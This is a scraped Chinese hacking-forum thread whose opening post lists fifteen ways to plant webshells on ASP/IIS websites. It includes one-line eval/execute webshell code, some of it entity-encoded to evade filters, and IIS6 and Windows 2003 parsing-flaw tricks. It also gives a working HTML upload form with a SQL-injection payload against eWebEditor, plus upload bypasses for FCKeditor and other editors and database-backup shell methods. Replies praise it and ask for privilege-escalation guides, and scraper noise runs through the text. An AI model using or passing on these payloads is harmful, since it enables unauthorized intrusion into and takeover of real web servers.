返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
- n! b1 V& D4 R8 ]
% o1 J& H$ M& V2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
1 H! c4 g+ k+ Y" c9 F1 N7 m5 C+ y  C( m
3.上传漏洞:
. l/ y* N+ [0 x# _" h$ B0 Q! Z7 e) {! a
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00& O1 D% _1 g' P. C9 M; a3 z* ^
$ b# Z1 j1 H/ M1 c& x
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件6 h- A* {( c$ M% n
& @$ }$ Q8 x- v
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp; K7 h. X% Q! S% m* r: b. H$ ~% @0 h3 M
然后在上传文件里面填要传的图片格式的ASP木马3 _" J, t3 M5 n% x: j+ f
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp; s- g) b, w$ \  {
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
5 I. D- H* P+ C, r- `: |% s( t% H' g
<html>
3 o8 R; \  s9 K* o2 C% B<head>4 i) |" _) @4 R* A; F
<title>ewebeditor upload.asp上传利用</title>
1 p  n, }, j+ c- T$ i</head>
& }! X$ P* d1 k+ @" u7 e  Q<body>
' k" @/ U  k5 b0 v5 e2 V<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">7 p- M3 I5 {6 e3 e/ }
<input type=file name=uploadfile size=100><br><br>% h- J% k: Z. W9 y
<input type=submit value=Fuck>  Z- I8 ~3 F9 Q5 }& `
</form>
$ ?5 p8 o0 ?  U. v$ Z' p' M</body>
3 U+ f2 Q' I6 m" [6 G</form>
8 ]8 z( R/ W5 u; d1 b7 _</html>
. F' V+ w# f, ^% _' X6 D) b& I# ?- n' s# a
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
" ]0 a' H1 ^; [5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
7 q7 ~0 ~* Q1 {2 T* a5 ]9 C8 }( d, e. d$ y
利用windows2003解析。建立zjq.asp的文件夹
) c$ h2 T0 u4 z! z' o" o0 }
1 h! c: F4 P$ n  P& s9 e: q6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型. g9 F& c+ Z8 e7 S

* Q$ h- H1 }9 i4 F1 s; S$ r/ @7.cuteeditor:类似ewebeditor  m4 N, S3 c  I+ x- @
- N3 t/ y0 ^3 G0 X, z# `
8.htmleditor:同上- c- B: s1 Y1 y; j8 m, O( n

2 y' U: q3 y0 w6 B5 X) W# b9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破+ V2 S  m) T4 `2 D  d
& ]+ H  H7 F. F! Q5 S' W+ A. S
<%execute request("value")%><%'<% loop <%:%>
* l  e+ Z2 e0 k2 _& t: z- d' p% t$ O6 k8 D* h  ?# m0 g
<%'<% loop <%:%><%execute request("value")%>2 I/ w. R( V- p2 W! O' ^
5 S: K/ v7 a4 f% t
<%execute request("value")'<% loop <%:%>/ r( G0 d  Z2 o5 H' t3 Z
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
/ X% x" p2 N8 X' x& d8 n. h$ d  K% M
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
  Y" H( P6 }. t: R2 H* b7 y- N! p( ?* K& _* t! n
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3: ^3 V% V) p( o9 x
9 O9 O  M4 F: O& S
解析漏洞得到webshell
+ o8 l/ z  _: o0 W: h# J$ W" ?2 [! n/ F) d
12.mssql差异备份,日志备份,前提需知道web路径7 K4 U2 ^  R0 ^, O, ?

- Z. p7 Q8 ^; F13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell: F8 v6 i4 P0 n4 P/ r

8 ]9 F" T% t$ Y) q6 y+ \: ]14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
9 L) x8 Z6 i2 W+ b& \# k& j# U/ L9 p, s" w; @# ]% B$ J# O
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
8 `# C3 A2 m; I1 H- i, w: Q/ r9 d. l- Z
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
/ L( H* o) F$ t& w不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 $ S; A# M' F+ O: U# N8 z

1 S4 h. j* p, K( t+ {" Z! C7 Z0 Z  U. ]$ T% h1 f' a* @
很好啊、基本的入侵方法都包含了# }8 J6 X, V: L5 v: j! F
; _, J" m- J, L" n. j
最好来个提权的帖子再。
, M( a- B. i/ N  S9 l
5 ~7 B3 g# f+ y$ ]5 L1 U不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表